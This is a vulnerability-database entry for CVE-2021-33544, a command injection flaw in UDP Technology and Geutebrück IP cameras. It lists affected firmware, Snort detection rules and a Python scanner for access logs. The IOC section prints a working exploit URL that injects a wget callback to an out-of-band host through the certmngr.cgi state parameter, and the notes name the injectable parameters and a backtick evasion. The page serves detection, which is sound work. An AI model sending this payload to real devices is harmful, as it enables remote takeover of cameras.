CVE-2021-33544
published 2021-09-13

Priority: P181 high · CVSS 3.1 score: 7.2
Vector: AV:N / AC:L / PR:H / UI:N / S:U / C:H / I:H / A:H
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 94.62% (99.8th percentile)
Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.

Affected

66 ranges · showing 25

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| geutebr_ck | e2_series | | |
| geutebr_ck | e2_series | | |
| geutebr_ck | e2_series | | |
| geutebr_ck | e2_series | | |
| geutebr_ck | e2_series | | |
| geutebr_ck | e2_series | | |
| geutebr_ck | e2_series | | |
| geutebr_ck | e2_series | | |
| geutebr_ck | e2_series | EBC-21xx – 1.12.0.27 | |
| geutebr_ck | e2_series | EFD-22xx – 1.12.0.27 | |
| geutebr_ck | e2_series | ETHC-22xx – 1.12.0.27 | |
| geutebr_ck | e2_series | EWPC-22xx – 1.12.0.27 | |
| geutebr_ck | encoder_g-code | | |
| geutebr_ck | encoder_g-code | | |
| geutebr_ck | encoder_g-code | | |
| geutebr_ck | encoder_g-code | | |
| geutebr_ck | encoder_g-code | EEC-2xx – 1.12.0.27 | |
| geutebr_ck | encoder_g-code | EEN-20xx – 1.12.0.27 | |
| geutebrueck | g-cam_ebc-2110_firmware | <= 1.12.0.27 | |
| geutebrueck | g-cam_ebc-2110_firmware | | |
| geutebrueck | g-cam_ebc-2110_firmware | | |
| geutebrueck | g-cam_ebc-2111_firmware | <= 1.12.0.27 | |
| geutebrueck | g-cam_ebc-2111_firmware | | |
| geutebrueck | g-cam_ebc-2111_firmware | | |
| geutebrueck | g-cam_ebc-2112_firmware | <= 1.12.0.27 | |

Detection & IOCs (extracted from sources)

url: //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything
path: /uapi-cgi/certmngr.cgi
path: /testcmd.cgi
path: /simple_reclistjs.cgi
path: /factory.cgi
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - certmngr.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/certmngr.cgi?action=createselfcert&"; fast_pattern; content:"&state=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033295; rev:2;)
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - testcmd.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/testcmd.cgi?"; fast_pattern; content:"command=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033305; rev:1;)
snort
alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - testcmd.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/testcmd.cgi?"; fast_pattern; content:"command=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033304; rev:1;)
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - simple_reclistjs.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/simple_reclistjs.cgi?"; fast_pattern; content:"date=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033303; rev:1;)
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - factory.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/factory.cgi?"; fast_pattern; content:"preserve=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033297; rev:1;)
  • Exploit targets the `state` parameter of certmngr.cgi with a shell command substitution payload (e.g., `$(...)`). Look for `&state=$` (URL-encoded as `&state=%24`) in HTTP GET requests to /certmngr.cgi.
  • Exploit targets the `command` parameter of testcmd.cgi with a shell command substitution payload. Look for `command=$` (URL-encoded as `command=%24`) in HTTP GET requests to /testcmd.cgi, both inbound and outbound.
  • Exploit targets the `date` parameter of simple_reclistjs.cgi with a shell command substitution payload. Look for `date=$` in HTTP GET requests to /simple_reclistjs.cgi.
  • Exploit targets the `preserve` parameter of factory.cgi with a shell command substitution payload. Look for `preserve=$` in HTTP GET requests to /factory.cgi.
  • The Nuclei PoC uses an out-of-band (OAST/interactsh) HTTP callback via a `wget` command injected into the `state` parameter to confirm exploitation. Monitor for unexpected outbound HTTP connections from camera devices.
  • All exploit attempts use HTTP GET method against the vulnerable CGI endpoints. Unauthenticated access is possible — no authentication headers are required in the PoC request.
  • The Nuclei template uses `interactsh-url` as a placeholder for an out-of-band interaction server. The detection matcher only confirms exploitation via an HTTP callback (`interactsh_protocol: http`), meaning blind/non-OAST environments will not trigger the matcher.
  • The ET Snort rules use `|24|` as the hex representation of the `$` character to detect shell command injection. Attackers using alternative injection syntaxes (e.g., backticks) may evade these signatures.
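
The detection notes above can also be applied after the fact to web or proxy access logs. The following is an added example, not part of the original page or of any vendor or ruleset code: it percent-decodes the four watched parameters and flags `$` or a backtick anywhere in the value, which goes beyond the ET rules by covering the backtick caveat and payloads that do not start right after `param=`. The log layout (common log format request field) and all sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# CGI endpoint -> injectable parameter, as listed in the detection notes above.
WATCHED = {
    "certmngr.cgi": "state",
    "testcmd.cgi": "command",
    "simple_reclistjs.cgi": "date",
    "factory.cgi": "preserve",
}
# `$` is what the ET rules key on (|24|); the backtick covers the evasion caveat.
SHELL_SUBST = re.compile(r"[$`]")
# Assumption: common/combined log format, request field is "METHOD URI PROTO".
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')


def suspicious_params(uri):
    """Return [(endpoint, param, decoded_value)] for watched params with $ or `."""
    parts = urlsplit(uri)
    # Use only the last path segment so /uapi-cgi/x.cgi and //uapi-cgi/x.cgi both match.
    endpoint = parts.path.rsplit("/", 1)[-1].lower()
    param = WATCHED.get(endpoint)
    if param is None:
        return []
    # parse_qsl percent-decodes, so `%24` and a literal `$` are treated alike.
    return [
        (endpoint, param, value)
        for name, value in parse_qsl(parts.query, keep_blank_values=True)
        if name.lower() == param and SHELL_SUBST.search(value)
    ]


def scan(lines):
    """Yield (line_number, endpoint, param, value) for every flagged log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            for hit in suspicious_params(match.group("uri")):
                yield (number, *hit)


# Constructed sample lines: documentation IPs, placeholder text instead of commands.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:00:00:01 +0000] "GET /uapi-cgi/certmngr.cgi?action=createselfcert&state=%24(PLACEHOLDER)&days=1 HTTP/1.1" 200 0',
    '198.51.100.7 - - [01/Jan/2024:00:00:02 +0000] "GET /uapi-cgi/testcmd.cgi?command=%60PLACEHOLDER%60 HTTP/1.1" 200 0',
    '203.0.113.9 - - [01/Jan/2024:00:00:03 +0000] "GET /uapi-cgi/factory.cgi?preserve=1 HTTP/1.1" 200 0',
    '198.51.100.7 - - [01/Jan/2024:00:00:04 +0000] "GET //uapi-cgi/simple_reclistjs.cgi?date=2024-01-01%24(PLACEHOLDER) HTTP/1.1" 200 0',
    '203.0.113.9 - - [01/Jan/2024:00:00:05 +0000] "GET /index.html?state=%24x HTTP/1.1" 200 0',
]
```

Lines 2 and 4 of the sample would not match the `param=|24|` content checks in the rules above, which is why the scan looks at the whole decoded value.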

CVSS provenance

nvd · v3.1 · 7.2 HIGH · CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvd · v2.0 · 6.5 MEDIUM · AV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck · 7.2 HIGH